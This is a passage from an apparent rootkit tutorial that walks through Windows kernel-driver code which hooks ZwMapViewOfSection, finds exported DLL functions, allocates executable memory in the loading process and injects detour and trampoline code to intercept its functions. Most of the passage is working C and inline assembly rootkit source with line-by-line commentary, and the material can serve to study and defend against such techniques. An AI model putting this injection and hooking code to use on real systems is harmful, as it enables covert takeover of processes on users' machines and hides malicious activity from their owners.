First, in line 33 of the listing, we run the original ZwMapViewOfSection to map the requested library. Then, in line 91, ObReferenceObjectByHandle gives us a pointer to the section object behind the handle (which may describe a DLL, a file, a shared buffer and so on). As you might have expected, it is not easy to find a function to be hooked in memory. The first step is to know when the desired library (the one containing the function to be hooked) is being mapped by a process. Unfortunately the structures that would help us are undocumented, so we must dig through memory to find useful data. All we know is that the section object pointer (pSection) sometimes refers to a DLL. With [] meaning a pointer dereference, let DLL = [[pSection + 20] + imageOffset], where imageOffset is 24 on version 4 and 0 on version 5. If the 6th bit (mask 0x20) of the byte at DLL + 32 is 1, the section is an image; in that case [[DLL + 36] + 4] is the module handle and [DLL + 36] + 48 is the address of the DLL name. This is the logic of the assembly code in lines 109 to 141. After that, in line 171, if the DLL name is the one we expect, we can start looking for the function to hook from the start of the DLL (GetFunctionAddress searches either by the function's opcodes or by its name). For code injection we need to copy our code into the memory of the process that is loading the DLL, so we have to allocate some memory in that process. Line 253 does that allocation and returns the base address of the allocated memory. Once the function's address is known, we inject our custom code using processInject in line 257.
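The opcode search mentioned above amounts to a plain byte-pattern scan over the mapped image. The following is a minimal user-mode sketch of that idea, not the book's code: the name find_pattern and the use of memcmp are assumptions made for illustration, and it returns an offset rather than a pointer.

```c
#include <stddef.h>
#include <string.h>

/* Returns the offset of the first occurrence of pattern in image,
   or (size_t)-1 when the pattern does not occur.
   find_pattern is a hypothetical name used only for this sketch. */
size_t find_pattern(const unsigned char *image, size_t image_len,
                    const unsigned char *pattern, size_t pattern_len)
{
    size_t i;

    if (pattern_len == 0 || pattern_len > image_len)
        return (size_t)-1;

    /* <= so that a match ending on the last byte is still found */
    for (i = 0; i <= image_len - pattern_len; i++) {
        if (memcmp(image + i, pattern, pattern_len) == 0)
            return i;
    }
    return (size_t)-1;
}
```

The offset does not depend on where the image happens to be mapped, so adding it to the image's base address in another address space gives the function's address there. GetFunctionAddress performs the same translation when it computes BaseAddress + (bytePtr - mappedBase).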

The preceding code contains a lot of lines for things you take for granted in user land. In kernel programming you have to write your own function to compare two strings and manage every access to memory yourself. IsSameFile, IsSameString and checkPattern are just helper functions that compare strings or bytes:

// This should be fast!

int checkPattern( unsigned char* pattern1, unsigned char* pattern2, size_t size )

{

            register unsigned char* p1 = pattern1;

            register unsigned char* p2 = pattern2;

            while( size-- > 0 )

    {

                        if( *p1++ != *p2++ )

                                    return 1;

            }

            return 0;

}

 

// Used to compare a full path to a file name(after the last \)

BOOL IsSameFile(PUNICODE_STRING shortString, PUNICODE_STRING longString)

{

            USHORT index;

            USHORT longLen;

            USHORT shortLen;

            USHORT count;

 

            index = longString->Length / 2; // wchar_t len is length / 2

 

            // search backwards for backslash

            while( --index )

                        if ( longString->Buffer[index] == L'\\' )

                                    break;

 

            // check for same length first

            longLen = (longString->Length / 2) - index - 1; // length of the part after the last backslash

            shortLen = shortString->Length / 2;

            if( shortLen != longLen )

                        return FALSE;

 

            // Compare

            count = 0;

            while ( count < longLen )

                        if ( longString->Buffer[++index] != shortString->Buffer[count++] )

                                    return FALSE;

 

            // Match!

            return TRUE;

}

 

// Compare two char strings, ignoring case

BOOL IsSameString( char* first, char* second )

{

            while( *first && *second )

            {

                        if( tolower( *first ) != tolower( *second ) )

                                    return FALSE;

                        first++;

                        second++;

            }

            if( *first || *second ) // one string ended before the other

                        return FALSE;

 

            // strings match!

            return TRUE;

}
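The comparison done by IsSameFile can be tried out in user mode. The sketch below is an illustration under stated assumptions, not the book's code: it works on null-terminated wchar_t strings instead of UNICODE_STRING, the name same_file_name is hypothetical, and unlike IsSameFile it ignores case and accepts a path that contains no backslash.

```c
#include <stddef.h>
#include <wchar.h>
#include <wctype.h>

/* Returns 1 when the part of full_path after the last backslash equals
   file_name, ignoring case; returns 0 otherwise.
   same_file_name is a hypothetical name used only for this sketch. */
int same_file_name(const wchar_t *file_name, const wchar_t *full_path)
{
    const wchar_t *base = wcsrchr(full_path, L'\\');

    /* no backslash at all: compare against the whole string */
    base = base ? base + 1 : full_path;

    while (*base && *file_name) {
        if (towlower((wint_t)*base) != towlower((wint_t)*file_name))
            return 0;
        base++;
        file_name++;
    }

    /* equal only if both strings ended at the same time */
    return *base == L'\0' && *file_name == L'\0';
}
```

Ignoring case is a design choice here: the object name seen by the hook carries whatever capitalization the loader used, so a case-sensitive comparison may miss a match.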

 

In kernel programming, to avoid a page fault you must be sure that the memory you reference is mapped. That is why we first map the address returned by ZwMapViewOfSection and lock its pages so that they cannot be paged out. A couple of helper functions do this mapping; here is the source code of MapKernelAddress and FreeKernelAddress:

// Map user address space into the kernel

PVOID MapKernelAddress( PVOID pAddress, PMDL* ppMDL, ULONG size ) // returns a system-space address through which the memory at pAddress can be accessed

{

            PVOID pMappedAddr = NULL;

           

            *ppMDL = IoAllocateMdl( pAddress, size, FALSE, FALSE, NULL ); // returns a Memory Descriptor List describing size bytes starting at pAddress

            if( *ppMDL == NULL )

                        return NULL;

 

            __try

            {

                        MmProbeAndLockPages( *ppMDL, KernelMode ,IoReadAccess );

            }

            __except( EXCEPTION_EXECUTE_HANDLER )

            {

                        IoFreeMdl( *ppMDL );

                        *ppMDL = NULL;

                        return NULL;

            }

 

            pMappedAddr = MmGetSystemAddressForMdlSafe( *ppMDL, HighPagePriority ); //MmGetSystemAddressForMdlSafe returns the base system-space virtual address that maps the physical pages that the specified MDL describes. If the pages are not already mapped to system address space and the attempt to map them fails, NULL is returned.

            if( !pMappedAddr )

            {

                        MmUnlockPages( *ppMDL );

                        IoFreeMdl( *ppMDL );

                        *ppMDL = NULL;

                        return NULL;

            }

 

            return pMappedAddr;

}

 

// Free kernel space after mapping in user memory

VOID FreeKernelAddress( PVOID* ppMappedAddr, PMDL* ppMDL )

{

            if( *ppMappedAddr && *ppMDL )

                        MmUnmapLockedPages( *ppMappedAddr, *ppMDL );

 

            *ppMappedAddr = NULL;

            if( *ppMDL )

            {

                        MmUnlockPages( *ppMDL );

                        IoFreeMdl( *ppMDL );

            }

            *ppMDL = NULL;

}

 

In addition to these useful helpers, GetFunctionAddress is an important function that finds the address of the function to be hooked. It does that by digging into the DLL. A DLL starts with a header that the code accesses through a PIMAGE_DOS_HEADER pointer; you can see its structure in Figure 1. That header has the e_lfanew field, which holds the offset of the structure accessed through PIMAGE_NT_HEADER (Figure 2), and this structure in turn has a virtual address field that leads to the PIMAGE_EXPORT_DIRECTORY structure (Figure 3). The export directory refers to several arrays that hold the names of the exported functions and their addresses. Locating a function by its name is done using this structure in the DLL header.

Pimage_Dos_Header structure for code injection

Figure 1 (PIMAGE_DOS_HEADER)

PIMAGE_NT_HEADER for code injection

Figure 2 (PIMAGE_NT_HEADER)
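The hop from the DOS header to the NT headers and on to the export entry can be sketched over a raw byte buffer. This is a minimal illustration that assumes a 32-bit (PE32) image and uses the fixed offsets of that layout; find_export_directory and read_u32 are hypothetical names, and the driver code itself uses the header structures instead.

```c
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian 32-bit value without assuming alignment. */
static uint32_t read_u32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* For a PE32 image held in buf, store the RVA and size of the export
   directory and return 1. Return 0 if the headers look invalid.
   Hypothetical helper, written only for this sketch. */
int find_export_directory(const unsigned char *buf, size_t len,
                          uint32_t *rva, uint32_t *size)
{
    uint32_t nt;

    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return 0;                      /* no DOS header */

    nt = read_u32(buf + 0x3C);         /* e_lfanew: offset of NT headers */
    if (nt > len || len - nt < 0x80)
        return 0;                      /* NT headers out of range */
    if (buf[nt] != 'P' || buf[nt + 1] != 'E' ||
        buf[nt + 2] != 0 || buf[nt + 3] != 0)
        return 0;                      /* missing "PE\0\0" signature */
    if (buf[nt + 24] != 0x0B || buf[nt + 25] != 0x01)
        return 0;                      /* optional header magic is not PE32 */

    /* signature (4) + file header (20) + 96 bytes of optional header
       lead to DataDirectory[0], which is the export entry */
    *rva  = read_u32(buf + nt + 0x78);
    *size = read_u32(buf + nt + 0x7C);
    return 1;
}
```

Both values are relative to the image base, which is why GetFunctionAddress adds mappedBase before it dereferences anything.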

PIMAGE_EXPORT_DIRECTORY structure for code injection

Figure 3 (PIMAGE_EXPORT_DIRECTORY)
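The way the three export arrays work together is easier to see on plain arrays. The sketch below is a simplified stand-in, not the real structure: struct export_table and lookup_export are hypothetical, names are ordinary C strings rather than RVAs, and the comparison is case-sensitive.

```c
#include <stddef.h>
#include <string.h>

/* Simplified stand-in for the three export arrays (hypothetical type). */
struct export_table {
    const char *const *names;        /* plays the role of AddressOfNames */
    const unsigned short *ordinals;  /* plays the role of AddressOfNameOrdinals */
    const unsigned long *functions;  /* plays the role of AddressOfFunctions */
    size_t number_of_names;
};

/* Returns the RVA of the named export, or 0 when it is not found. */
unsigned long lookup_export(const struct export_table *t, const char *name)
{
    size_t i;

    for (i = 0; i < t->number_of_names; i++) {
        if (strcmp(t->names[i], name) == 0) {
            /* the name's position selects an entry in the ordinal array,
               and that entry is the index into the function array */
            unsigned short index = t->ordinals[i];
            return t->functions[index];
        }
    }
    return 0;
}
```

The name array and the ordinal array are parallel, while the function array is indexed by the ordinal value. That indirection is why the loop in GetFunctionAddress reads ordinalArray[loop] before it touches functionAddressArray.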

Below is the code of GetFunctionAddress:

// Get the address of a function from a DLL

// Pass in the base address of the DLL

// Pass function name OR pattern and pattern length

PVOID GetFunctionAddress(  PVOID BaseAddress,

                                                                                    char* functionName,

                                                                                    PBYTE pattern,

                                                                                    size_t patternLength  )

{

    ULONG imageSize;

    ULONG virtualAddress;

    PVOID returnAddress;

    PULONG functionAddressArray;

    PWORD ordinalArray;

    PULONG functionNameArray;

    ULONG loop;

    ULONG ordinal;

            PVOID mappedBase;

            PMDL pMDL;

            BYTE* bytePtr;

            BYTE* maxBytePtr;

    PIMAGE_DOS_HEADER pDOSHeader;

    PIMAGE_NT_HEADER pNTHeader;

    PIMAGE_EXPORT_DIRECTORY exportDirectory;

 

            imageSize = GetImageSize( BaseAddress ); //to get the size of dll

            mappedBase = MapKernelAddress( BaseAddress, &pMDL, imageSize ); // map imageSize bytes starting at BaseAddress; the reason for mapping is explained in GetImageSize

 

            if ( functionName == NULL )

            {

                        // Search for function pattern

                        returnAddress = 0;

                        maxBytePtr = (PBYTE)((DWORD)mappedBase + (DWORD)imageSize - (DWORD)patternLength);

                        for( bytePtr = (PBYTE)mappedBase; bytePtr < maxBytePtr; bytePtr++ )

                        {         

                                    if( checkPattern( bytePtr, pattern, patternLength ) == 0 )

                                    {

                                                returnAddress = (PVOID)((DWORD)BaseAddress + (DWORD)bytePtr - (DWORD)mappedBase); // bytePtr is the address of the function in our kernel mapping; subtracting mappedBase gives its offset in the image, and adding BaseAddress gives its address in the user process

                                                break;

                                    }

                        }

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

                        return returnAddress;

            }

           

            // Search for function name

    pDOSHeader = (PIMAGE_DOS_HEADER)mappedBase;

    pNTHeader = (PIMAGE_NT_HEADER)((PCHAR)mappedBase + pDOSHeader->e_lfanew);

    imageSize = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; // IMAGE_DIRECTORY_ENTRY_EXPORT is an index defined in the Windows headers and is equal to 0. This line gets the size in bytes of the export directory data (not the number of exported functions); the imageSize variable is simply reused

    virtualAddress = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; // this line gets the relative virtual address (RVA) of the export directory

    exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PCHAR)mappedBase + virtualAddress); // see Figure 3 for the structure

    functionAddressArray = (PULONG)((PCHAR)mappedBase + exportDirectory->AddressOfFunctions); // an array containing address of exported functions

    ordinalArray  = (PWORD)((PCHAR)mappedBase + exportDirectory->AddressOfNameOrdinals); // an array whose elements are indexes into AddressOfFunctions. Suppose you have the name X: first find X in AddressOfNames, then use the position of that name to read the corresponding value in the ordinal array. That value is the index of the function in AddressOfFunctions

    functionNameArray     = (PULONG)((PCHAR)mappedBase + exportDirectory->AddressOfNames);

 

            ordinal = (ULONG)functionName;

    if (!ordinal)

            {

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

                        return 0;

            }

    if( ordinal <= exportDirectory->NumberOfFunctions ) // the function can also resolve an export by ordinal value instead of by name

    {

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

        return (PVOID)((PCHAR)BaseAddress + functionAddressArray[ordinal - 1]);

    }

 

    for( loop = 0; loop < exportDirectory->NumberOfNames; loop++ )

    {

                        ordinal = ordinalArray[loop];

                        if( functionAddressArray[ordinal] < virtualAddress || functionAddressArray[ordinal] >= virtualAddress + imageSize ) // make sure the function address does not fall inside the export directory itself (an address in that range is a forwarder string, not code)

        {

            if( IsSameString( (PSTR)((PCHAR)mappedBase + functionNameArray[loop]), functionName ) ) // functionNameArray[loop] is a relative address, so it is added to mappedBase to get a pointer to the function name inside our own mapping of the image

            {

                                                returnAddress = (PVOID)functionAddressArray[ordinal];

                                                if( mappedBase )

                                                            FreeKernelAddress( &mappedBase, &pMDL );

                return (PVOID)((DWORD)BaseAddress + (DWORD)returnAddress); //functionAddressArray[ordinal] is added to BaseAddress since we want the function location in process

            }

        }

    }

 

            DbgPrint("comint32: EXPORT NOT FOUND, function = %s", functionName);

           

            if( mappedBase )

                        FreeKernelAddress( &mappedBase, &pMDL );

            return 0;

}
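
The name lookup above follows the three-array scheme of an export directory: the position of a name selects an ordinal entry, and that entry indexes the function array. A minimal sketch of just that indexing, using small hand-made arrays instead of a real image (ToyExports and toy_lookup are hypothetical names made up for this illustration):

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for the three export arrays; not a real PE structure. */
typedef struct {
    const char **names;              /* plays the role of AddressOfNames        */
    const unsigned short *ordinals;  /* plays the role of AddressOfNameOrdinals */
    const unsigned long *functions;  /* plays the role of AddressOfFunctions    */
    size_t numberOfNames;
} ToyExports;

/* Return the function RVA for `name`, or 0 if the name is not exported. */
unsigned long toy_lookup(const ToyExports *e, const char *name)
{
    size_t i;
    for (i = 0; i < e->numberOfNames; i++) {
        if (strcmp(e->names[i], name) == 0) {
            /* The position of the name selects an entry in the ordinal array,
               and that entry is the index into the function array. */
            return e->functions[e->ordinals[i]];
        }
    }
    return 0;
}
```

Note that the name array and the ordinal array are walked in parallel, while the function array is only ever reached through an ordinal.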

 

To allocate memory for our injected code we use allocateUserMemory. Here is the source code:

 

PCHAR allocateUserMemory()
{
LONG memorySize;
LONG tableSize;
LONG codeSize;
LONG dataSize;
ULONG buffer[2];
NTSTATUS status;
PCHAR pMemory;
IN_PROCESS_DATA* pData;

 

// Calculate sizes
// tableSize = (DetourFunction - HookTable) * TOTAL_HOOKS
// codeSize = EndOfInjectedCode - DetourFunction
// dataSize = sizeof( IN_PROCESS_DATA )
__asm
{
lea eax, HookTable
lea ebx, DetourFunction
lea ecx, EndOfInjectedCode
mov edx, ebx
sub edx, eax
mov tableSize, edx
mov edx, ecx
sub edx, ebx
mov codeSize, edx
}
tableSize = tableSize * TOTAL_HOOKS;
dataSize = sizeof( IN_PROCESS_DATA );
memorySize = tableSize + codeSize + dataSize; //whole size to be allocated in process area

 

// Allocate memory
buffer[0] = 0;
buffer[1] = memorySize;
// Remember that the process called ZwMapViewOfSection, which we hooked, so the code here runs in the context of that process. Passing the current-process handle therefore allocates memory in that process's address space
status = ZwAllocateVirtualMemory( (HANDLE)-1, (PVOID*)buffer, 0, &buffer[1], MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // (HANDLE)-1 is -1 cast to HANDLE, which means the current process; buffer[0] receives the base address of the allocated memory; buffer[1] passes in the requested size and receives the size actually allocated
pMemory = (PCHAR)(buffer[0]); // the base address of the allocated pages

 

if( !NT_SUCCESS( status ) || !pMemory )
return NULL;

 

// initialize memory
memset( pMemory, 0x90, tableSize + codeSize ); // fill the table and code areas with no-ops (0x90)
pData = (IN_PROCESS_DATA*)(pMemory + tableSize + codeSize );
memset( (PVOID)pData, 0, dataSize ); // fill the data section with zeros

return pMemory;
}

 

 

HookTable, DetourFunction and IN_PROCESS_DATA are the code and data to be injected into the calling process. You will see their source code in a minute; for now just note that they are laid out in memory in exactly this order. All of the injected code lies between HookTable and EndOfInjectedCode, with DetourFunction marking the end of the table and the start of the detour code. IN_PROCESS_DATA is just a struct that keeps pointers to the library functions the injected code needs.
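
The size calculation in allocateUserMemory comes down to plain offset arithmetic. A minimal sketch, assuming the three areas are packed back to back as described above (ToyLayout and toy_layout are hypothetical names, and the sizes are supplied by the caller instead of being measured from labels):

```c
#include <stddef.h>

/* Hypothetical description of the allocated block. */
typedef struct {
    size_t tableOffset; /* start of the hook table copies */
    size_t codeOffset;  /* start of the detour code       */
    size_t dataOffset;  /* start of the data structure    */
    size_t totalSize;   /* number of bytes to allocate    */
} ToyLayout;

ToyLayout toy_layout(size_t tableEntrySize, size_t totalHooks,
                     size_t codeSize, size_t dataSize)
{
    ToyLayout l;
    l.tableOffset = 0;
    l.codeOffset  = tableEntrySize * totalHooks; /* one table entry per hook */
    l.dataOffset  = l.codeOffset + codeSize;
    l.totalSize   = l.dataOffset + dataSize;
    return l;
}
```

For example, with an 80-byte table entry, 2 hooks, 300 bytes of code and 16 bytes of data, the code starts at offset 160, the data at offset 460, and 476 bytes are needed in total.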

Code injection

With code injection we overwrite the first instruction of the hooked function so that it transfers control to our custom code, and we copy the code we need into the process.

To inject our code we must know its destination address. When we allocate memory we get back the start address of the allocation, and that is where we start copying. Not everything we copy is meant to be executed. We reserve some space to pass data from the hooked kernel function to the userland hook (this data tells the hooking function how to set up the stack so that no fault or exception arises). We also need space to save the original first instruction of the hooked function, and space for references to OS library functions. The getHookPointers function finds the offsets of these areas by adding the size of each section to the start of the allocated memory, keeping track of where each section ends.

BOOL getHookPointers( PCHAR pMemory, PCHAR* pTable, PCHAR* pCode, PCHAR* pData ) // sets *pTable to the address of the HookTable area, *pCode to the address of the DetourFunction area and *pData to the address of the IN_PROCESS_DATA area

{

            LONG  tableSize = 0;

            LONG  codeSize = 0;

            LONG  dataSize = 0;

 

            __asm

            {

                        lea eax, HookTable

                        lea ebx, DetourFunction

                        lea ecx, EndOfInjectedCode

                        mov edx, ebx

                        sub edx, eax

                        mov tableSize, edx

                        mov edx, ecx

                        sub edx, ebx

                        mov codeSize, edx

            }

           

            tableSize = tableSize * TOTAL_HOOKS;

            dataSize = sizeof(IN_PROCESS_DATA);

            *pTable = pMemory;

            *pCode = *pTable + tableSize;

            *pData = *pCode + codeSize;

            return TRUE;

}

 

pTable is where the modified first instruction of the hooked function will point. We also keep the parameters from the kernel and the original first instruction of the hooked function there. After execution is transferred to pTable, some initialization happens and then execution continues at pCode. pData is where we save pointers to library functions.

Here is the code to be copied to pTable:

#define EMIT_FOUR( x ) __asm{ __asm _emit x __asm _emit x __asm _emit x __asm _emit x } // __asm _emit places the byte x directly in the code at this point, as if it were an opcode

void __declspec(naked) HookTable( void )

{

            __asm // Pay attention to the usage of edx: it is never saved, so its initial value is overwritten, but that is not a problem since nothing has run yet

            {

                        push eax // save eax; other registers are not saved because the only registers used are eax and edx, and edx carries the parameter for the detour function

                        xor eax, eax

                        call phoney_call // call the next line so that the run-time address of phoney_call is pushed on the stack as the return address (lea would only give the address assigned at build time)

phoney_call:

                        lea eax, phoney_call

                        lea edx, phoney_jump

                        sub edx, eax // edx = phoney_jump - phoney_call, the distance between the two labels, which is added to the real address of phoney_call below

                        pop eax // the real address of phoney_call is popped from the top of the stack

                        add eax, edx // the real address of phoney_jump is calculated

                        mov edx, eax // edx is used by the detour function; it is not modified before then because the detour is reached by the jump below

                        pop eax // restore the eax value that was saved at the start

                        jmp DetourFunction // this instruction must be patched: as compiled it points to the detour function in our own code, but what we need is the address of the detour function in the caller process

phoney_jump:

                        EMIT_FOUR( 0xff ) // emits a 32-bit value of -1; process-inject searches for this value to find where the parameter data goes

                        EMIT_FOUR( 0x0 ) // the previous 4 bytes, these 4 bytes and the following two 4-byte slots store the call-data structure that was passed to process-inject (needed to adjust the stack)

                        EMIT_FOUR( 0x0 )

                        EMIT_FOUR( 0x0 )

                        EMIT_FOUR( 0x90 ) // these 4 no-op bytes plus the next eight 4-byte slots store the first instruction and the jmp back to the original function (no-ops + jmp, or normal instruction + jmp to the original function)

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        jmp EndOfInjectedCode // this is later replaced by no-ops

            }

}

 

__declspec(naked) tells the compiler to generate no prologue or epilogue code for the function, so any stack frame setup and cleanup must be written by hand. As I mentioned, HookTable is where the initialization for the real code takes place. It just calculates the real address of the parameters passed from the kernel (by our kernel hook function) and then transfers control to DetourFunction (which pCode also points to), where the real magic happens:
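
The call/pop trick in HookTable is a small piece of relocation arithmetic: the distance between two labels is the same in the compiled code and in the copied code, so one known run-time address is enough to find the other. A minimal sketch of that arithmetic only (toy_relocate is a hypothetical helper, not part of the original source):

```c
#include <stdint.h>

/* Given the build-time addresses of two labels and the run-time address of
   the first one, return the run-time address of the second. */
uintptr_t toy_relocate(uintptr_t buildA, uintptr_t buildB, uintptr_t runtimeA)
{
    /* Unsigned arithmetic wraps around, so this also works when B precedes A. */
    uintptr_t delta = buildB - buildA;
    return runtimeA + delta;
}
```

In HookTable, buildA and buildB correspond to the values loaded by the two lea instructions, and runtimeA is the value popped from the stack after the call.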

#define PUSH_STACKFRAME( ) __asm{ __asm push ebp __asm mov ebp, esp __asm sub esp, __LOCAL_SIZE __asm push edi __asm push esi __asm push ebx __asm pushfd } // needed because some of our functions are naked, so we must write the prologue ourselves

#define POP_STACKFRAME( ) __asm{ __asm popfd __asm pop ebx __asm pop esi __asm pop edi __asm mov esp, ebp __asm pop ebp } // the epilogue: after the final pop ebp, esp is back at the value it had on entry to the function

void __declspec(naked) DetourFunction( void ) // __declspec(naked) means the compiler generates no prologue, so the prologue is written manually

{

            PUSH_STACKFRAME(); // the prologue: save ebp, copy esp into ebp, reserve space for locals, then save edi, esi, ebx and the flags

            {

                        DWORD                      hookIndex;

                        DWORD                      parameters;

                        DWORD                      callType;

                        DWORD                      stackOffset;

                        PCHAR                        trampolineFunction;

                        IN_PROCESS_DATA*            callData;

                        PCHAR                        codeStart;

                        PDWORD                    originalStack;

                        DWORD                      tempStack;

                        int                                loop;

                        int                                parameters4return;

                        DWORD                      parameter2return = 0;

                        DWORD                      continueFlag;

                        DWORD                      register_esp;

                        DWORD                      register_edi;

                        DWORD                      register_esi;

                        DWORD                      register_eax;

                        DWORD                      register_ebx;

                        DWORD                      register_ecx;

                        DWORD                      add2stack;

 

                        // setup to call injected functions

                        __asm

                        {

                                    mov register_esp, esp // this and following lines save the register values

                                    mov register_edi, edi

                                    mov register_esi, esi

                                    mov register_eax, eax

                                    mov register_ebx, ebx

                                    mov register_ecx, ecx

 

                                    // get parameters

                                    push edx // save edx because its value (the phoney_jump address) is used more than once

                                    mov edx, [edx+CALLDATA_INDEX_LOCATION] // load the INDEX parameter passed by process-inject; it is stored in the first 4 bytes

                                    mov hookIndex, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_PARAMETERS_LOCATION] // load the parameters value, stored like the index, in the second 4 bytes

                                    mov parameters, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_CALLTYPE_LOCATION] // the call type is either cdecl (CDECL_TYPE) or another calling convention

                                    mov callType, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_STACK_OFFSET_LOCATION]

                                    mov stackOffset, edx

                                    pop edx

                                    push edx

                                    add edx, TRAMPOLINE_LOCATION // this is 16 bytes after phoney_jump, the first nop instruction (0x90 opcode)

                                    mov trampolineFunction, edx

                                    pop edx

                                    // calculate the start address

                                    xor eax, eax // zeros the eax register

                                    call called_without_return // like call to phoney_call to get the address on top of the stack

called_without_return:

                                    pop eax // address of the called_without_return is now in eax

                                    lea ebx, DetourFunction

                                    lea ecx, called_without_return

                                    sub ecx, ebx

                                    sub eax, ecx // in fact now eax has the value (called_without_return real address) - (called_without_return - DetourFunction) which is Detour Function

                                    mov codeStart, eax //codeStart points to detour_function start

                                    // data area

                                    lea ecx, EndOfInjectedCode

                                    sub ecx, ebx // ecx contains EndOfInjectedCode - DetourFunction

                                    add ecx, eax //End of EndOfInjectedCode address

                                    mov callData, ecx // callData now contains address of IN_PROCESS_DATA (In allocateUserMemory we allocated IN_PROCESS_DATA after HookTable(tableSize) and Detour Function(codeSize))

                                    // calculate the last ret address

                                    mov eax, ebp // ebp by PUSH_STACKFRAME macro got the original esp - 4 (subtracted by 4 because the ebp before storing esp was pushed)

                                    add eax, 4        // adding 4 means in fact pop (because x86 stack grows down) and now eax has the original esp

                                    add eax, stackOffset

                                    mov originalStack, eax // will be used to read parameters

                        }

 

                        // setup return call type

                        if( callType == CDECL_TYPE )

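                                    add2stack = parameters * sizeof( DWORD ); // cdecl: the parameters we push for the original function are still on the stack after it returns, so we must pop them

                        else

                                    add2stack = 0; // otherwise the original function removes its own parameters from the stack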

                        // call pre-injected code

                        continueFlag = BeforeOriginalFunction( hookIndex, originalStack, &parameter2return, callData ); // this function checks which function is hooked and calls the matching handler, in this case beforeEncode

                        if( continueFlag == (DWORD)TRUE ) // a FALSE continueFlag means we do not want to run the original hooked function, which is what beforeEncode requests in this example when it finds input

                        {

                                    for( loop = parameters; loop > 0; loop-- ) // this "for" aims to construct the parameters again on top of the stack: the parameters are after return address so it should read originalStack[1] and originalStack[2]

                                    {

                                                tempStack = originalStack[loop];

                                                __asm push tempStack

                                    }

                                    // Call trampoline (jumps to original function)

                                    //

                                    // Since trampoline is a jump, the return in

                                    // the original function will come back here.

                                    __asm

                                    {

                                                lea ebx, DetourFunction

                                                lea eax, return_from_trampoline

                                                sub eax, ebx

                                                add eax, codeStart // the address of return address which is return_from_trampoline now is on top of the stack

                                                // construct call

                                                push eax

                                                // adjust stack

                                                sub esp, stackOffset // actually nothing changes since the stackOffset is 0

                                                // restore registers and call

                                                mov edi, register_edi

                                                mov esi, register_esi

                                                mov eax, register_eax

                                                mov ebx, register_ebx

                                                mov ecx, register_ecx

                                                jmp trampolineFunction // run the saved first instruction and jump on to the second instruction of the hooked function; when that function returns it lands on the next line, whose address we pushed on the stack

return_from_trampoline:

                                                add esp, add2stack // pop the parameters that we pushed on the stack

                                                mov parameter2return, eax // save the return value in parameter2return

                                    }

                                    // call post-injected code

                                    AfterOriginalFunction( hookIndex, originalStack, &parameter2return, callData ); //Do nothing for now, just to show the concept

                        }

                        // prepare to return

                        tempStack = *originalStack;

                        if( callType == CDECL_TYPE )

                                    parameters4return = 0; // cdecl: the caller removes the parameters

                        else

                                    parameters4return = parameters; // otherwise we must remove the parameters ourselves before returning

                        __asm

                        {

                                    mov eax, parameter2return

                                    mov ecx, tempStack // the return address to the caller is stored at the top of the original stack, so ecx now contains the return address

                                    mov edx, parameters4return

                                    shl edx, 2 // multiply by 4, size of a DWORD

                                    add edx, stackOffset

                                    POP_STACKFRAME(); // original stack

                                    add esp, 4 // pop the return address

                                    add esp, edx // remove stackOffset plus, when the callee must clean the stack ( !CDECL_TYPE ), the parameters

                                    jmp ecx // jump to return address

                        }

                        __asm mov edx, trampolineFunction // unreachable: the jmp ecx above never falls through to here

            }

            POP_STACKFRAME(); // unreachable as well

            __asm jmp edx // unreachable as well

}

 

What we do must not disturb the rest of the execution, so we first save the registers and restore them later. The PUSH_STACKFRAME() call at the top of DetourFunction does the saving. In the block under "get parameters" we retrieve the parameters passed from the kernel, using the address that HookTable left in edx. Right after that we store in trampolineFunction the address of the trampoline, which holds the saved first instruction of the hooked function followed by a jump back into it. While executing our custom code we may need the parameters of the original hooked function. They are still on the stack, and we can reach them because control arrives at DetourFunction through a jmp rather than a call, so the stack is unchanged. The rest of the first __asm block computes codeStart, points callData at the IN_PROCESS_DATA structure holding the library function pointers, and points originalStack at the original stack. We then run our custom code before the hooked function by calling BeforeOriginalFunction. To run code after the original function we do much what we do when exploiting a buffer overflow: we place a return address on the stack that points to our post-hook code. The "construct call" block pushes the run-time address of return_from_trampoline. Then jmp trampolineFunction executes the first instruction of the hooked function, followed by a jump back into the rest of it. When the original function returns, control arrives at return_from_trampoline, where we clean the stack according to the calling convention and save the return value so it can be handed back to the caller.
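
The stack bookkeeping in DetourFunction depends only on the calling convention and the number of parameters. A minimal sketch of the two quantities the listing calls add2stack and parameters4return (converted to bytes), assuming 4-byte parameters as on 32-bit x86; the enum and function names are hypothetical:

```c
#include <stddef.h>

/* Hypothetical call types; the original code compares against CDECL_TYPE. */
enum ToyCallType { TOY_CDECL = 0, TOY_CALLEE_CLEANS = 1 };

/* Bytes the detour pops itself after the original function returns. */
size_t toy_pop_after_call(enum ToyCallType type, size_t parameters)
{
    /* cdecl leaves the re-pushed parameters on the stack for us to remove. */
    return type == TOY_CDECL ? parameters * 4 : 0;
}

/* Bytes of parameters the detour removes before returning to its caller. */
size_t toy_pop_on_return(enum ToyCallType type, size_t parameters)
{
    /* With cdecl the caller cleans up, so the detour removes nothing. */
    return type == TOY_CDECL ? 0 : parameters * 4;
}
```

The two values mirror each other: whichever side does not clean up after the inner call has to clean up on the way out.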

The execution flow after hooking the desired function is as in figure 4:

Figure 4: Rootkit source code execution flow

